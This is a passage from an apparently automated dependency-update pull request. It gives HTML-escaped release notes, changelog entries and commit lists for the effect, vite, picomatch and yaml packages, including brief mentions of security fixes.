\u003ccode\u003eStream.decodeText\u003c/code\u003e to correctly handle multi-byte UTF-8 characters split across chunk boundaries.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/Effect-TS/effect/blob/main/packages/effect/CHANGELOG.md\"\u003eeffect's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e3.20.0\u003c/h2\u003e\n\u003ch3\u003eMinor Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/Effect-TS/effect/pull/6124\"\u003e#6124\u003c/a\u003e \u003ca href=\"https://github.com/Effect-TS/effect/commit/8798a843218e6c0c0d3a8eee83360880e370b4da\"\u003e\u003ccode\u003e8798a84\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/mikearnaldi\"\u003e\u003ccode\u003e@​mikearnaldi\u003c/code\u003e\u003c/a\u003e! - Fix scheduler task draining to isolate \u003ccode\u003eAsyncLocalStorage\u003c/code\u003e across fibers.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/Effect-TS/effect/pull/6107\"\u003e#6107\u003c/a\u003e \u003ca href=\"https://github.com/Effect-TS/effect/commit/fc82e81448bd9136a37580139ce46a2c61b11b54\"\u003e\u003ccode\u003efc82e81\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/gcanti\"\u003e\u003ccode\u003e@​gcanti\u003c/code\u003e\u003c/a\u003e! - Backport \u003ccode\u003eTypes.VoidIfEmpty\u003c/code\u003e to 3.x\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/Effect-TS/effect/pull/6088\"\u003e#6088\u003c/a\u003e \u003ca href=\"https://github.com/Effect-TS/effect/commit/82996bce8debffcb44feb98bb862cf2662bd56b7\"\u003e\u003ccode\u003e82996bc\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/taylorOntologize\"\u003e\u003ccode\u003e@​taylorOntologize\u003c/code\u003e\u003c/a\u003e! - Schema: fix \u003ccode\u003eSchema.omit\u003c/code\u003e producing wrong result on Struct with \u003ccode\u003eoptionalWith({ default })\u003c/code\u003e and index signatures\u003c/p\u003e\n\u003cp\u003e\u003ccode\u003egetIndexSignatures\u003c/code\u003e now handles \u003ccode\u003eTransformation\u003c/code\u003e AST nodes by delegating to \u003ccode\u003east.to\u003c/code\u003e, matching the existing behavior of \u003ccode\u003egetPropertyKeys\u003c/code\u003e and \u003ccode\u003egetPropertyKeyIndexedAccess\u003c/code\u003e. Previously, \u003ccode\u003eSchema.omit\u003c/code\u003e on a struct combining \u003ccode\u003eSchema.optionalWith\u003c/code\u003e (with \u003ccode\u003e{ default }\u003c/code\u003e, \u003ccode\u003e{ as: \u0026quot;Option\u0026quot; }\u003c/code\u003e, etc.) and \u003ccode\u003eSchema.Record\u003c/code\u003e would silently take the wrong code path, returning a Transformation with property signatures instead of a TypeLiteral with index signatures.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/Effect-TS/effect/pull/6086\"\u003e#6086\u003c/a\u003e \u003ca href=\"https://github.com/Effect-TS/effect/commit/4d97a61a15b9dd6a0eece65b8f0c035e16d42ada\"\u003e\u003ccode\u003e4d97a61\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/taylorOntologize\"\u003e\u003ccode\u003e@​taylorOntologize\u003c/code\u003e\u003c/a\u003e! - Schema: fix \u003ccode\u003egetPropertySignatures\u003c/code\u003e crash on Struct with \u003ccode\u003eoptionalWith({ default })\u003c/code\u003e and other Transformation-producing variants\u003c/p\u003e\n\u003cp\u003e\u003ccode\u003eSchemaAST.getPropertyKeyIndexedAccess\u003c/code\u003e now handles \u003ccode\u003eTransformation\u003c/code\u003e AST nodes by delegating to \u003ccode\u003east.to\u003c/code\u003e, matching the existing behavior of \u003ccode\u003egetPropertyKeys\u003c/code\u003e. Previously, calling \u003ccode\u003egetPropertySignatures\u003c/code\u003e on a \u003ccode\u003eSchema.Struct\u003c/code\u003e containing \u003ccode\u003eSchema.optionalWith\u003c/code\u003e with \u003ccode\u003e{ default }\u003c/code\u003e, \u003ccode\u003e{ as: \u0026quot;Option\u0026quot; }\u003c/code\u003e, \u003ccode\u003e{ nullable: true }\u003c/code\u003e, or similar options would throw \u003ccode\u003e\u0026quot;Unsupported schema (Transformation)\u0026quot;\u003c/code\u003e.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/Effect-TS/effect/pull/6097\"\u003e#6097\u003c/a\u003e \u003ca href=\"https://github.com/Effect-TS/effect/commit/f6b0960bf3184109920dfed16ee7dfd7d67bc0f2\"\u003e\u003ccode\u003ef6b0960\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/gcanti\"\u003e\u003ccode\u003e@​gcanti\u003c/code\u003e\u003c/a\u003e! - Fix TupleWithRest post-rest validation to check each tail index sequentially.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.19.19\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/Effect-TS/effect/pull/6079\"\u003e#6079\u003c/a\u003e \u003ca href=\"https://github.com/Effect-TS/effect/commit/4eb5c008dfc7d2a97b191ca608948d994a2cce4c\"\u003e\u003ccode\u003e4eb5c00\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/tim-smart\"\u003e\u003ccode\u003e@​tim-smart\u003c/code\u003e\u003c/a\u003e! - add short circuit to fiber.await internals\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/Effect-TS/effect/pull/6079\"\u003e#6079\u003c/a\u003e \u003ca href=\"https://github.com/Effect-TS/effect/commit/4eb5c008dfc7d2a97b191ca608948d994a2cce4c\"\u003e\u003ccode\u003e4eb5c00\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/tim-smart\"\u003e\u003ccode\u003e@​tim-smart\u003c/code\u003e\u003c/a\u003e! - build ManagedRuntime synchronously if possible\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/Effect-TS/effect/pull/6081\"\u003e#6081\u003c/a\u003e \u003ca href=\"https://github.com/Effect-TS/effect/commit/2d2bb1364a906bd44800c6387b9575fddccdaf53\"\u003e\u003ccode\u003e2d2bb13\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/tim-smart\"\u003e\u003ccode\u003e@​tim-smart\u003c/code\u003e\u003c/a\u003e! - fix semaphore race condition where permits could be leaked\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.19.18\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/Effect-TS/effect/pull/6062\"\u003e#6062\u003c/a\u003e \u003ca href=\"https://github.com/Effect-TS/effect/commit/12b1f1eadf649e30dec581b7351ba3abb12f8004\"\u003e\u003ccode\u003e12b1f1e\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/tim-smart\"\u003e\u003ccode\u003e@​tim-smart\u003c/code\u003e\u003c/a\u003e! - prevent Stream.changes from writing empty chunks\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.19.17\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/Effect-TS/effect/pull/6040\"\u003e#6040\u003c/a\u003e \u003ca href=\"https://github.com/Effect-TS/effect/commit/a8c436f7004cc2a8ce2daec589ea7256b91c324f\"\u003e\u003ccode\u003ea8c436f\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/jacobconley\"\u003e\u003ccode\u003e@​jacobconley\u003c/code\u003e\u003c/a\u003e! - Fix \u003ccode\u003eStream.decodeText\u003c/code\u003e to correctly handle multi-byte UTF-8 characters split across chunk boundaries.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.19.16\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/Effect-TS/effect/pull/6018\"\u003e#6018\u003c/a\u003e \u003ca href=\"https://github.com/Effect-TS/effect/commit/e71889f35b081d13b7da2c04d2f81d6933056b49\"\u003e\u003ccode\u003ee71889f\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/codewithkenzo\"\u003e\u003ccode\u003e@​codewithkenzo\u003c/code\u003e\u003c/a\u003e! - fix(Match): handle null/undefined in \u003ccode\u003eMatch.tag\u003c/code\u003e and \u003ccode\u003eMatch.tagStartsWith\u003c/code\u003e\u003c/p\u003e\n\u003cp\u003eAdded null checks to \u003ccode\u003ediscriminator\u003c/code\u003e and \u003ccode\u003ediscriminatorStartsWith\u003c/code\u003e predicates to prevent crashes when matching nullable union types.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Effect-TS/effect/commit/aa473938a53d07837e84935329f4891a7d591c3b\"\u003e\u003ccode\u003eaa47393\u003c/code\u003e\u003c/a\u003e Version Packages (\u003ca href=\"https://github.com/Effect-TS/effect/tree/HEAD/packages/effect/issues/6089\"\u003e#6089\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Effect-TS/effect/commit/8798a843218e6c0c0d3a8eee83360880e370b4da\"\u003e\u003ccode\u003e8798a84\u003c/code\u003e\u003c/a\u003e fix(effect): isolate scheduler runners per fiber (\u003ca href=\"https://github.com/Effect-TS/effect/tree/HEAD/packages/effect/issues/6124\"\u003e#6124\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Effect-TS/effect/commit/fc82e81448bd9136a37580139ce46a2c61b11b54\"\u003e\u003ccode\u003efc82e81\u003c/code\u003e\u003c/a\u003e Backport \u003ccode\u003eTypes.VoidIfEmpty\u003c/code\u003e to 3.x (\u003ca href=\"https://github.com/Effect-TS/effect/tree/HEAD/packages/effect/issues/6107\"\u003e#6107\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Effect-TS/effect/commit/f6b0960bf3184109920dfed16ee7dfd7d67bc0f2\"\u003e\u003ccode\u003ef6b0960\u003c/code\u003e\u003c/a\u003e Backport: Fix TupleWithRest post-rest index drift validation bug (\u003ca href=\"https://github.com/Effect-TS/effect/tree/HEAD/packages/effect/issues/6097\"\u003e#6097\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Effect-TS/effect/commit/82996bce8debffcb44feb98bb862cf2662bd56b7\"\u003e\u003ccode\u003e82996bc\u003c/code\u003e\u003c/a\u003e fix(Schema): handle Transformation in getIndexSignatures for correct omit beh...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Effect-TS/effect/commit/4d97a61a15b9dd6a0eece65b8f0c035e16d42ada\"\u003e\u003ccode\u003e4d97a61\u003c/code\u003e\u003c/a\u003e Schema: fix getPropertySignatures crash on Struct with optionalWith({ default...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Effect-TS/effect/commit/ab3b64c20a039eb4d573fe757c41278925b22687\"\u003e\u003ccode\u003eab3b64c\u003c/code\u003e\u003c/a\u003e Version Packages (\u003ca href=\"https://github.com/Effect-TS/effect/tree/HEAD/packages/effect/issues/6080\"\u003e#6080\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Effect-TS/effect/commit/2d2bb1364a906bd44800c6387b9575fddccdaf53\"\u003e\u003ccode\u003e2d2bb13\u003c/code\u003e\u003c/a\u003e fix semaphore race condition where permits could be leaked (\u003ca href=\"https://github.com/Effect-TS/effect/tree/HEAD/packages/effect/issues/6081\"\u003e#6081\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Effect-TS/effect/commit/4eb5c008dfc7d2a97b191ca608948d994a2cce4c\"\u003e\u003ccode\u003e4eb5c00\u003c/code\u003e\u003c/a\u003e build ManagedRuntime synchronously if possible (\u003ca href=\"https://github.com/Effect-TS/effect/tree/HEAD/packages/effect/issues/6079\"\u003e#6079\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Effect-TS/effect/commit/4f2107548fa64c21a8643b7b0efcd556cd16d4b9\"\u003e\u003ccode\u003e4f21075\u003c/code\u003e\u003c/a\u003e Version Packages (\u003ca href=\"https://github.com/Effect-TS/effect/tree/HEAD/packages/effect/issues/6063\"\u003e#6063\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/Effect-TS/effect/commits/effect@3.20.0/packages/effect\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `vite` from 7.2.0 to 7.3.2\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/vitejs/vite/releases\"\u003evite's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev7.3.2\u003c/h2\u003e\n\u003cp\u003ePlease refer to \u003ca href=\"https://github.com/vitejs/vite/blob/v7.3.2/packages/vite/CHANGELOG.md\"\u003eCHANGELOG.md\u003c/a\u003e for details.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/vitejs/vite/blob/v7.3.2/packages/vite/CHANGELOG.md\"\u003evite's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003c!-- raw HTML omitted --\u003e\u003ca href=\"https://github.com/vitejs/vite/compare/v7.3.1...v7.3.2\"\u003e7.3.2\u003c/a\u003e (2026-04-06)\u003c!-- raw HTML omitted --\u003e\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eavoid path traversal with optimize deps sourcemap handler (\u003ca href=\"https://redirect.github.com/vitejs/vite/issues/22161\"\u003e#22161\u003c/a\u003e) (\u003ca href=\"https://github.com/vitejs/vite/commit/09d8c903bde12fee2710314d3b42bc789c686df7\"\u003e09d8c90\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ebackport \u003ca href=\"https://redirect.github.com/vitejs/vite/issues/22159\"\u003e#22159\u003c/a\u003e, apply server.fs check to env transport (\u003ca href=\"https://redirect.github.com/vitejs/vite/issues/22162\"\u003e#22162\u003c/a\u003e) (\u003ca href=\"https://github.com/vitejs/vite/commit/19db0f29c3a3ac4e64cc95c270716c77fd223ad1\"\u003e19db0f2\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003echeck \u003ccode\u003eserver.fs\u003c/code\u003e after stripping query as well (\u003ca href=\"https://redirect.github.com/vitejs/vite/issues/22160\"\u003e#22160\u003c/a\u003e) (\u003ca href=\"https://github.com/vitejs/vite/commit/f8103cc946f137a54e395fe3f5d08e8209231ed6\"\u003ef8103cc\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vitejs/vite/commit/cc383e07b66d4c5a9768fcb570e0af812cb8d999\"\u003e\u003ccode\u003ecc383e0\u003c/code\u003e\u003c/a\u003e release: v7.3.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vitejs/vite/commit/09d8c903bde12fee2710314d3b42bc789c686df7\"\u003e\u003ccode\u003e09d8c90\u003c/code\u003e\u003c/a\u003e fix: avoid path traversal with optimize deps sourcemap handler (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/22161\"\u003e#22161\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vitejs/vite/commit/f8103cc946f137a54e395fe3f5d08e8209231ed6\"\u003e\u003ccode\u003ef8103cc\u003c/code\u003e\u003c/a\u003e fix: check \u003ccode\u003eserver.fs\u003c/code\u003e after stripping query as well (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/22160\"\u003e#22160\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vitejs/vite/commit/19db0f29c3a3ac4e64cc95c270716c77fd223ad1\"\u003e\u003ccode\u003e19db0f2\u003c/code\u003e\u003c/a\u003e fix: backport \u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/22159\"\u003e#22159\u003c/a\u003e, apply server.fs check to env transport (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/22162\"\u003e#22162\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/vitejs/vite/commits/v7.3.2/packages/vite\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `picomatch` from 2.3.1 to 2.3.2\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/micromatch/picomatch/releases\"\u003epicomatch's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e2.3.2\u003c/h2\u003e\n\u003cp\u003eThis is a security release fixing several security relevant issues.\u003c/p\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix: exception when glob pattern contains constructor by \u003ca href=\"https://github.com/Jason3S\"\u003e\u003ccode\u003e@​Jason3S\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/micromatch/picomatch/pull/144\"\u003emicromatch/picomatch#144\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix for \u003ca href=\"https://github.com/micromatch/picomatch/security/advisories/GHSA-c2c7-rcm5-vvqj\"\u003eCVE-2026-33671\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix for \u003ca href=\"https://github.com/micromatch/picomatch/security/advisories/GHSA-3v7f-55p6-f55p\"\u003eCVE-2026-33672\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/micromatch/picomatch/compare/2.3.1...2.3.2\"\u003ehttps://github.com/micromatch/picomatch/compare/2.3.1...2.3.2\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/micromatch/picomatch/blob/master/CHANGELOG.md\"\u003epicomatch's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003eRelease history\u003c/h1\u003e\n\u003cp\u003e\u003cstrong\u003eAll notable changes to this project will be documented in this file.\u003c/strong\u003e\u003c/p\u003e\n\u003cp\u003eThe format is based on \u003ca href=\"http://keepachangelog.com/en/1.0.0/\"\u003eKeep a Changelog\u003c/a\u003e\nand this project adheres to \u003ca href=\"http://semver.org/spec/v2.0.0.html\"\u003eSemantic Versioning\u003c/a\u003e.\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003cul\u003e\n\u003cli\u003eChangelogs are for humans, not machines.\u003c/li\u003e\n\u003cli\u003eThere should be an entry for every single version.\u003c/li\u003e\n\u003cli\u003eThe same types of changes should be grouped.\u003c/li\u003e\n\u003cli\u003eVersions and sections should be linkable.\u003c/li\u003e\n\u003cli\u003eThe latest version comes first.\u003c/li\u003e\n\u003cli\u003eThe release date of each versions is displayed.\u003c/li\u003e\n\u003cli\u003eMention whether you follow Semantic Versioning.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003cp\u003eChangelog entries are classified using the following labels \u003cem\u003e(from \u003ca href=\"http://keepachangelog.com/\"\u003ekeep-a-changelog\u003c/a\u003e\u003c/em\u003e):\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eAdded\u003c/code\u003e for new features.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eChanged\u003c/code\u003e for changes in existing functionality.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eDeprecated\u003c/code\u003e for soon-to-be removed features.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eRemoved\u003c/code\u003e for now removed features.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eFixed\u003c/code\u003e for any bug fixes.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eSecurity\u003c/code\u003e in case of vulnerabilities.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003ch2\u003e4.0.0 (2024-02-07)\u003c/h2\u003e\n\u003ch3\u003eFixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix bad text values in parse \u003ca href=\"https://redirect.github.com/micromatch/picomatch/issues/126\"\u003e#126\u003c/a\u003e, thanks to \u003ca href=\"https://github.com/connor4312\"\u003e\u003ccode\u003e@​connor4312\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eChanged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eRemove process global to work outside of node \u003ca href=\"https://redirect.github.com/micromatch/picomatch/issues/129\"\u003e#129\u003c/a\u003e, thanks to \u003ca href=\"https://github.com/styfle\"\u003e\u003ccode\u003e@​styfle\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd sideEffects to package.json \u003ca href=\"https://redirect.github.com/micromatch/picomatch/issues/128\"\u003e#128\u003c/a\u003e, thanks to \u003ca href=\"https://github.com/frandiox\"\u003e\u003ccode\u003e@​frandiox\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRemoved \u003ccode\u003eos\u003c/code\u003e, make compatible browser environment. See \u003ca href=\"https://redirect.github.com/micromatch/picomatch/issues/124\"\u003e#124\u003c/a\u003e, thanks to \u003ca href=\"https://github.com/gwsbhqt\"\u003e\u003ccode\u003e@​gwsbhqt\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.0.1\u003c/h2\u003e\n\u003ch3\u003eFixes\u003c/h3\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/picomatch/commit/81cba8d4b767cab3cb29d26eb4f691eed75b73b2\"\u003e\u003ccode\u003e81cba8d\u003c/code\u003e\u003c/a\u003e Publish 2.3.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/picomatch/commit/fc1f6b69006e9435caf8fb40d8aff378bc0b7bce\"\u003e\u003ccode\u003efc1f6b6\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/picomatch/commit/eec17aee5428a7249e9ca5adbb8a0d28fa29619b\"\u003e\u003ccode\u003eeec17ae\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/picomatch/commit/78f8ca4362d9e66cadea97b93e292f10096452ed\"\u003e\u003ccode\u003e78f8ca4\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/micromatch/picomatch/issues/156\"\u003e#156\u003c/a\u003e from micromatch/backport-144\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/picomatch/commit/3f4f10eaa65bf3a52e8f2999674cd27e11fa3c9b\"\u003e\u003ccode\u003e3f4f10e\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/micromatch/picomatch/issues/144\"\u003e#144\u003c/a\u003e from Jason3S/jdent-object-properties\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/micromatch/picomatch/compare/2.3.1...2.3.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `yaml` from 2.8.1 to 2.9.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/eemeli/yaml/releases\"\u003eyaml's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev2.9.0\u003c/h2\u003e\n\u003cp\u003eThe changes here are really only patches, but I'm releasing this as a minor version to note a small change to the documentation of \u003ccode\u003eparseDocument()\u003c/code\u003e and \u003ccode\u003eparseAllDocuments()\u003c/code\u003e: I've removed the claim that they'll \u0026quot;never throw\u0026quot;.\u003c/p\u003e\n\u003cp\u003eIt remains the case that practically all non-malicious inputs will be handled without emitting an error, but there is a decent chance that code paths remain where e.g. a RangeError due to call stack exhaustion can be triggered by malicious inputs. Up to now, I've considered these as security vulnerabilities, and in fact it's the only category of error for which \u003ccode\u003eyaml\u003c/code\u003e CVEs have been issued so far.\u003c/p\u003e\n\u003cp\u003eStarting from this release, I'll be considering such errors as bugs, but not vulnerabilities. I do welcome people and/or LLMs looking for them, but please report them as normal issues rather than suspected security vulnerabilities. This also applies to previously undiscovered bugs in earlier releases.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003efix: Avoid calling \u003ccode\u003eArray.prototype.push.apply()\u003c/code\u003e with large source array\u003c/li\u003e\n\u003cli\u003efix(lexer): Avoid recursive calls that may exhaust the call stack\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.8.4\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDisable alias resolution with \u003ccode\u003emaxAliasCount:0\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/eemeli/yaml/issues/677\"\u003e#677\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eHandle invalid unicode escapes (e1a1a77)\u003c/li\u003e\n\u003cli\u003eApply \u003ccode\u003eminFractionDigits\u003c/code\u003e only to decimal strings (\u003ca href=\"https://redirect.github.com/eemeli/yaml/issues/676\"\u003e#676\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.8.3\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdd \u003ccode\u003etrailingComma\u003c/code\u003e ToString option for multiline flow formatting (\u003ca href=\"https://redirect.github.com/eemeli/yaml/issues/670\"\u003e#670\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eCatch stack overflow during node composition (1e84ebb)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.8.2\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eSerialize -0 as -0 (\u003ca href=\"https://redirect.github.com/eemeli/yaml/issues/638\"\u003e#638\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eDo not double newlines for empty map values (\u003ca href=\"https://redirect.github.com/eemeli/yaml/issues/642\"\u003e#642\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/eemeli/yaml/commit/ddb21b04cb889722cec8f89dc1b67f19d62d7f7d\"\u003e\u003ccode\u003eddb21b0\u003c/code\u003e\u003c/a\u003e 2.9.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/eemeli/yaml/commit/167365befdae1f03d53d47a8c6533140a9d48a75\"\u003e\u003ccode\u003e167365b\u003c/code\u003e\u003c/a\u003e docs: Clarify that not all errors can be avoided\u003c/li\u003e\n\u003cli\u003e\u003ca 